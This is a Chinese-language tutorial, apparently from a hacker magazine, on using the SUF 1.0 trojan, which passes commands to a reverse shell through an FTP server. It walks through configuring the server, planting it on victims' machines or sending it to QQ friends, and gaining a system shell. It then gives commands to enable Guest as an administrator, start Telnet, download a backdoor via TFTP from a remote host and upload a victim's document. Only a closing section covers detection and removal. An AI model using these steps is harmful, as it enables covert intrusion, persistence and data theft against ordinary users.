一個14歲的男孩經(jīng)過無數(shù)次的實驗，推出了一款全新的木馬——SUF 1.0，該后門運用了“反彈端口原理”與“FTP 隧道技術(shù)”，也就是兩臺機器不直接傳輸數(shù)據(jù)，而是利用第三臺機器（FTP服務(wù)器）來交換數(shù)據(jù).
　　SUF（Shell Use Ftp）顧名思義，就是通過FTP的Shell。這種奇妙的思路真叫絕的，它充分利用防火墻“外嚴內(nèi)不嚴”的漏洞，客戶端生成服務(wù)端后，把客戶端主機的IP發(fā)送到FTP里，然后別人運行服務(wù)端后下載IP文件，然后通過反向連接，使客戶端知道服務(wù)端上線，然后把要執(zhí)行的命令發(fā)送到FTP里，服務(wù)端再讀取FTP里要執(zhí)行的命令，最后完成執(zhí)行。
　　說了這么一大堆，SUF是不是真的有這么厲害？用事實來說明一切，跟我來……
　　一、摩拳擦掌——配置服務(wù)端
　　和一般的木馬后門大體相同，首先將下載下來的SUF 1.0解壓縮，雙擊運行其中的client.exe，出現(xiàn)主窗口，非常簡潔明了吧！點擊“配置服務(wù)端”按鈕，彈出了配置對話窗口，這里僅需要配置一下FTP服務(wù)選項。在“FTP”欄中填入一個有寫權(quán)限的FTP服務(wù)器，如：Ftp.abc.com或者220.202.242.98。接著在“端口”欄中填寫好FTP服務(wù)器端口，默認為21。再在“用戶名”和“密碼”欄中輸入FTP帳戶名稱和密碼，點擊“配置服務(wù)器”，出現(xiàn)一提示對話框，點擊“確定”，這時程序就會開始驗證FTP服務(wù)器，驗證成功后請選擇木馬服務(wù)端（server.exe）的路徑，最后完成配置。
　　小提示：如果要給服務(wù)端加殼，請在配置服務(wù)端之前給服務(wù)端（server.exe）加殼，服務(wù)端是可重復(fù)配置的。同時一定要確保使用的FTP帳戶對FTP服務(wù)器有寫的權(quán)限。
二、玩弄骨掌——輕松來控制
　　接下來是玩木馬后門必不可少的環(huán)節(jié)，那就是種植木馬。種植木馬的方法、途徑有很多，以前也專門有文章介紹過，大家可以發(fā)揮自己的聰明才智，把服務(wù)端上傳到肉雞或者發(fā)給QQ好友等，當服務(wù)端程序被運行后，一般的使用者很難感覺到計算機有異常，防火墻也不會出現(xiàn)報警。其實，一只黑手正在慢慢靠近，服務(wù)端程序會自動從FTP服務(wù)器中獲取客戶端的IP地址，然后開始反向連接，這時服務(wù)端計算機的IP地址就會出現(xiàn)在客戶端的“上線列表”中。
　　小提示：客戶端計算機必須是直接連接到Internet，而不能是處于內(nèi)網(wǎng)中，同時，如果開啟了防火墻的話，請打開5915端口。
　　在“上線列表”中雙擊某一在線計算機的IP（例如：220.202.242.100），出現(xiàn)“連接到220.202.242.100”對話窗口，這就已經(jīng)得到了目標計算機的一個系統(tǒng)權(quán)限的Shell，現(xiàn)在想干什么就自由發(fā)揮吧！
　　想想既然是送上門的肉雞，還是留個后門，以便日后再次光顧吧！這里就將Guest帳戶激活，并提升為管理員，再開啟目標計算機的Telnet服務(wù)，下面就看如何來實現(xiàn)？請輸入命令：net user guest /active:yes，點擊“運行”來激活Guest帳戶，再運行命令：net localgroup administrators guest /add，將Guest加入管理員組，最后再運行命令：net start telnet，開啟目標計算機的遠程登錄服務(wù)。
　　其實，在這里有很多東東可以應(yīng)用的，比如可以通過FTP命令或者TFTP來遠程下載/上傳文件。這里假設(shè)已經(jīng)知道有一個TFTP服務(wù)器220.202.242.99，我們從服務(wù)器上下載一個后門程序Sy.exe，只要運行命令：tftp 220.202.242.99 get sy.exe；要把肉雞上的一個數(shù)據(jù)文檔Ccash.doc上傳到TFTP服務(wù)器只要運行命令：tftp 220.202.242.99 put Ccash.doc。
　　小提示：Windows自身附帶了一個簡單的文件上傳下載程序Tftp.exe，可要建立TFTP服務(wù)器，就得借助TFTPD32了。
　　三、擺脫控制——隔離隧道
　　雖然SUF 1.0的實現(xiàn)方法非常隱蔽，可還是能夠?qū)⑵浣藴绲模梢越柚鶤ctive Ports(下載地址：http://www.ldcatv.com/soft/aports.rar)等端口實時監(jiān)測工具來發(fā)現(xiàn)、中止它。如果中了SUF后門，就可在“Active Ports”主窗口中發(fā)現(xiàn)兩個server.exe進程，其中一個通過4319端口與FTP服務(wù)器進行通訊，另一個通過4321端口與客戶端計算機進行通訊。選擇它們，再點擊“Terminate Process”來結(jié)束進程。然后在資源管理器中將server.exe刪除，這樣就擺脫了SUF的控制。